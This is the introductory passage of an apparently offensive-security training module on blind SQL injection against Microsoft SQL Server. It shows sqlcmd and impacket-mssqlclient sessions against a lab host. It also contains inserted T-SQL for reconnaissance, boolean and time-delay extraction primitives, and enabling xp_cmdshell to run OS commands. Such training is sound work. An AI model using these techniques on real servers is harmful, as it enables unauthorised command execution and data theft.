
Blind SQL Injection

In this module, we cover blind SQL injection attacks and MSSQL-specific attacks.


Created by bmdyy

Hard Offensive

Summary

Blind SQL injection is an SQL injection in which the application returns no query results to the attacker, so data has to be inferred from side channels such as a true/false difference in the response or a time delay. This module focuses on writing custom scripts to exfiltrate data through such alternative channels. The examples use MSSQL throughout, so MSSQL-specific attacks are also covered, including obtaining remote code execution.

This module is split up into the following 7 sections:

  1. Introduction: A very brief introduction to MSSQL, and an introduction to blind SQL injection.
  2. Boolean-based SQLi: Work through a custom website, identifying a boolean-based blind SQLi vulnerability in the target, writing a custom script to extract data, looking at different ways to optimize the attack, and using out-of-band techniques to extract data as an alternative.
  3. Time-based SQLi: Work through a second custom website identifying a time-based blind SQLi and writing a script to extract data.
  4. MSSQL-Specific Attacks: Work through various MSSQL-specific attacks such as remote code execution and leaking NetNTLM hashes.
  5. Tools of the Trade: Introduce commonly used tools to identify and exploit SQL injections.
  6. Defending against SQL Injections: Various ways to prevent SQL injection vulnerabilities from happening in your projects.
  7. Skills Assessment: Another custom website which involves identifying and exploiting multiple blind SQL injection vulnerabilities.

After completing this module, you should be comfortable identifying and writing custom scripts to exploit blind SQL injection vulnerabilities.


This module is broken into sections with accompanying hands-on exercises to practice the tactics and techniques we cover. The module ends with a practical hands-on skills assessment to gauge your understanding of the various topic areas.

As you work through the module, you will see example commands and command output for the topics introduced. It is worth reproducing as many of these examples as possible to further reinforce the concepts presented in each section. You can do this on the target host provided in the interactive sections or in your own virtual machine.

You can start and stop the module anytime and pick up where you left off. There is no time limit or "grading," but you must complete all of the exercises and the skills assessment to receive the maximum number of cubes and have this module marked as complete in any paths you have chosen.

The module is classified as "hard" and assumes an intermediate knowledge of how web applications function and common attack principles, along with knowledge of basic SQL injections.

Introduction to MSSQL/SQL Server

Introduction

SQL is a standardized language for interacting with relational databases. The five most common (as of Dec 15, 2022) are:

  1. Oracle
  2. MySQL
  3. Microsoft SQL Server
  4. PostgreSQL
  5. IBM Db2

In this module, we will be focusing on blind SQL injection attacks using examples in Microsoft SQL Server (MSSQL). In addition to this, we will cover MSSQL-specific attacks. As SQL is standardized, the attacks taught in this module may be easily adapted to work against other relational databases.

Interacting with MSSQL

Although we will be dealing with injection vulnerabilities through websites for the rest of this module, it is helpful to understand how to interact with MSSQL (SQL Server) directly, be it through a command-line or GUI application. Direct access is also the fastest way to check what a payload actually does before wrapping it in an injection.

Note: As this is an advanced SQL module, it is expected that you already understand the basics of SQL and are comfortable building queries yourself.

SQLCMD (Windows, Command Line)

SQLCMD is a command-line utility developed by Microsoft for running T-SQL against SQL Server. It ships with SQL Server on Windows and is also available for Linux and macOS as part of the mssql-tools package.

To connect to a SQL Server we can use the following syntax. In this case, we are connecting to the bsqlintro database on the server SQL01 with the credentials thomas:TopSecretPassword23!. The flags are -S (server), -U (login), -P (password) and -d (database); the last flag (-W) removes trailing spaces, which makes the output a bit easier to read. Note that a password passed with -P ends up in the PowerShell history and is visible to other local users in the process list; omitting -P makes sqlcmd prompt for it instead, and -E uses Windows authentication with no password at all.

PS C:\htb> sqlcmd -S 'SQL01' -U 'thomas' -P 'TopSecretPassword23!' -d bsqlintro -W
1>

To run SQL queries, simply enter them and type GO (which is the default batch separator) at the end to run. In this example we select all table information, and then the top 5 posts from the users table joined with the posts table.

PS C:\htb> sqlcmd -S 'SQL01' -U 'thomas' -P 'TopSecretPassword23!' -d bsqlintro -W
1> SELECT *
2> FROM INFORMATION_SCHEMA.TABLES;
3> GO
TABLE_CATALOG TABLE_SCHEMA TABLE_NAME TABLE_TYPE
------------- ------------ ---------- ----------
bsqlintro dbo users BASE TABLE
bsqlintro dbo posts BASE TABLE

(2 rows affected)
1> SELECT TOP 5 users.firstName, users.lastName, posts.title
2> FROM users
3> JOIN posts
4> ON users.id=posts.authorId;
5> GO
firstName lastName title
--------- -------- -----
Edward Strong Voluptatem neque labore dolore velit ut.
David Ladieu Etincidunt etincidunt adipisci sed consectetur.
Natasha Ingham Aliquam quiquia velit non aliquam sed sit etincidunt.
Jessica Fitzpatrick Dolor porro quiquia labore numquam numquam sit.
Mary Evans Tempora sed velit consectetur labore consectetur.

(5 rows affected)

Impacket-MSSQLClient (Linux, Command Line)

MSSQLClient.py (or impacket-mssqlclient) is part of the Impacket toolset, which comes preinstalled on many security-focused Linux distributions. It speaks the TDS protocol directly, so we can interact with a remote MSSQL server without needing Windows.

The syntax to connect looks like this:

[!bash!]$ impacket-mssqlclient thomas:'TopSecretPassword23!'@SQL01 -db bsqlintro

We can run queries as usual. Note that this Impacket version prints character columns as Python byte strings, hence the b'...' wrapping in the output:

[!bash!]$ impacket-mssqlclient thomas:'TopSecretPassword23!'@SQL01 -db bsqlintro
Impacket v0.10.0 - Copyright 2022 SecureAuth Corporation

[*] Encryption required, switching to TLS
[*] ENVCHANGE(DATABASE): Old Value: master, New Value: bsqlintro
[*] ENVCHANGE(LANGUAGE): Old Value: , New Value: us_english
[*] ENVCHANGE(PACKETSIZE): Old Value: 4096, New Value: 16192
[*] INFO(SQL01): Line 1: Changed database context to 'bsqlintro'.
[*] INFO(SQL01): Line 1: Changed language setting to us_english.
[*] ACK: Result: 1 - Microsoft SQL Server (150 7208) 
[!] Press help for extra shell commands
SQL> SELECT * FROM INFORMATION_SCHEMA.TABLES;
TABLE_CATALOG   TABLE_SCHEMA   TABLE_NAME   TABLE_TYPE
-------------   ------------   ----------   -------------
bsqlintro       dbo            users        b'BASE TABLE'
bsqlintro       dbo            posts        b'BASE TABLE'

SQL> SELECT TOP 5 users.firstName, users.lastName, posts.title FROM users JOIN posts ON users.id=posts.authorId;
firstName    lastName         title
---------    --------         -----
b'Edward'    b'Strong'        b'Voluptatem neque labore dolore velit ut.'
b'David'     b'Ladieu'        b'Etincidunt etincidunt adipisci sed consectetur.'
b'Natasha'   b'Ingham'        b'Aliquam quiquia velit non aliquam sed sit etincidunt.'
b'Jessica'   b'Fitzpatrick'   b'Dolor porro quiquia labore numquam numquam sit.'
b'Mary'      b'Evans'         b'Tempora sed velit consectetur labore consectetur.'

SQL> exit
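The queries above only list tables. As an added example (not part of the original module page), the following T-SQL batch is the first-contact reconnaissance a tester would run once connected with either sqlcmd or impacket-mssqlclient: who the login is and whether it is sysadmin, which databases exist, and the column layout of the tables the page already showed. The database name bsqlintro, the login thomas and the tables users/posts are taken from the page; the system views and functions are standard SQL Server. The last two statements run, with direct access, the two primitives that blind extraction later relies on (a boolean test on one character of a value, and a delay that only fires when the test holds), so their behaviour can be seen before they are ever used through an injection point.

```sql
-- Added example, not from the module page. Assumes the bsqlintro database and
-- the dbo.users / dbo.posts tables shown on the page; everything else is
-- standard SQL Server system catalog.

-- Who am I and what can I do? sysadmin membership decides whether xp_cmdshell
-- and similar server-level features later in the module are reachable at all.
SELECT @@VERSION                    AS version,
       SYSTEM_USER                  AS login_name,   -- server login, e.g. thomas
       USER_NAME()                  AS db_user,      -- user inside the current database
       DB_NAME()                    AS current_db,
       IS_SRVROLEMEMBER('sysadmin') AS is_sysadmin;  -- 1 = member, 0 = not, NULL = login not found

-- Every database on the instance. INFORMATION_SCHEMA only covers the current
-- database, so sys.databases is the place to look for others.
SELECT name, database_id
FROM   sys.databases
ORDER  BY database_id;

-- Column names, types and lengths of the known tables. A blind extraction
-- script needs exactly this to know what to pull and how long it may be.
SELECT TABLE_NAME, COLUMN_NAME, DATA_TYPE, CHARACTER_MAXIMUM_LENGTH
FROM   INFORMATION_SCHEMA.COLUMNS
WHERE  TABLE_SCHEMA = 'dbo'
  AND  TABLE_NAME IN ('users', 'posts')
ORDER  BY TABLE_NAME, ORDINAL_POSITION;

-- Boolean primitive: is the first character of the database name 'b'?
-- Returns 1 for bsqlintro. Through a vulnerable page this 1/0 becomes
-- "normal response" versus "different response".
SELECT CASE WHEN ASCII(SUBSTRING(DB_NAME(), 1, 1)) = ASCII('b')
            THEN 1 ELSE 0 END AS first_char_is_b;

-- Time primitive: the same test, but the only observable is a 3 second delay.
IF ASCII(SUBSTRING(DB_NAME(), 1, 1)) = ASCII('b')
    WAITFOR DELAY '00:00:03';
```

In sqlcmd, paste the batch and finish it with GO. impacket-mssqlclient sends each input line as its own query, so each statement has to be entered on a single line there (the IF ... WAITFOR statement included), and GO must not be typed since it is a client-side batch separator, not T-SQL.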

Since MSSQLClient.py is a pen-testing tool, it has a couple of features that help us when attacking MSSQL servers. For example, enable_xp_cmdshell turns the xp_cmdshell extended stored procedure on via sp_configure (this requires the sysadmin role), and xp_cmdshell <command> then runs an OS command on the server. Commands run in the context of the SQL Server service account, NT SERVICE\mssqlserver in the output below, not as the SQL login that invoked them. We will cover this later on in the module.

[!bash!]$ impacket-mssqlclient thomas:'TopSecretPassword23!'@SQL01 -db bsqlintro
Impacket v0.10.0 - Copyright 2022 SecureAuth Corporation

[*] Encryption required, switching to TLS
[*] ENVCHANGE(DATABASE): Old Value: master, New Value: bsqlintro
[*] ENVCHANGE(LANGUAGE): Old Value: , New Value: us_english
[*] ENVCHANGE(PACKETSIZE): Old Value: 4096, New Value: 16192
[*] INFO(SQL01): Line 1: Changed database context to 'bsqlintro'.
[*] INFO(SQL01): Line 1: Changed language setting to us_english.
[*] ACK: Result: 1 - Microsoft SQL Server (150 7208) 
[!] Press help for extra shell commands
SQL> enable_xp_cmdshell
[*] INFO(SQL01): Line 185: Configuration option 'show advanced options' changed from 1 to 1. Run the RECONFIGURE statement to install.
[*] INFO(SQL01): Line 185: Configuration option 'xp_cmdshell' changed from 1 to 1. Run the RECONFIGURE statement to install.
SQL> xp_cmdshell whoami
output
--------------------------------------------------------------------------------
NT SERVICE\mssqlserver
NULL

SQL> exit
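The enable_xp_cmdshell command hides what is actually sent to the server. As an added example (not from the module page), here is the same sequence as plain T-SQL, so it can be run from sqlcmd or SSMS, or stacked into an injection point later in the module. The sysadmin check at the top is my addition to avoid a noisy failed attempt; the sp_configure options 'show advanced options' and 'xp_cmdshell' and the RECONFIGURE step are the ones visible in the tool's output above. The restore step assumes both options were 0 beforehand (the SQL Server default); in the lab output above they were already 1, which is why the messages read "changed from 1 to 1".

```sql
-- Added example, not from the module page: manual equivalent of
-- impacket-mssqlclient's enable_xp_cmdshell, plus cleanup.
IF IS_SRVROLEMEMBER('sysadmin') <> 1
    RAISERROR('current login is not sysadmin; xp_cmdshell cannot be enabled', 16, 1);
ELSE
BEGIN
    -- Record the current state first so it can be restored afterwards.
    SELECT name, value_in_use
    FROM   sys.configurations
    WHERE  name IN ('show advanced options', 'xp_cmdshell');

    -- xp_cmdshell is an "advanced" option, so it is only settable once
    -- advanced options are exposed. Each change needs RECONFIGURE to apply.
    EXEC sp_configure 'show advanced options', 1;
    RECONFIGURE;
    EXEC sp_configure 'xp_cmdshell', 1;
    RECONFIGURE;

    -- Commands run as the SQL Server service account (NT SERVICE\mssqlserver in
    -- the page's output) when the caller is sysadmin; non-sysadmin callers are
    -- routed through the xp_cmdshell proxy account instead, if one is configured.
    EXEC master.sys.xp_cmdshell 'whoami';
    EXEC master.sys.xp_cmdshell 'whoami /priv';

    -- Put the configuration back the way it was found (assumed 0/0 here;
    -- use the values recorded above if they differ). Disable xp_cmdshell
    -- before hiding advanced options again, or the second change is refused.
    EXEC sp_configure 'xp_cmdshell', 0;
    RECONFIGURE;
    EXEC sp_configure 'show advanced options', 0;
    RECONFIGURE;
END
```

Each xp_cmdshell call returns one row per line of command output, terminated by a NULL row, which is the NULL seen under the whoami output above. Leaving xp_cmdshell enabled after an engagement widens the server's attack surface for anyone else who obtains sysadmin, so the cleanup is not optional.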

SQL Server Management Studio (Windows, GUI)

SQL Server Management Studio is a GUI tool developed by Microsoft for interacting with MSSQL. When launching the application we are prompted to connect to a server:


After connecting, we can view the databases in the server by opening the Databases folder.


We can list the tables by opening the specific database, and then the Tables folder.


To run queries on a database we can right-click and select New Query.


We can enter queries into the new tab, and run by clicking Execute.

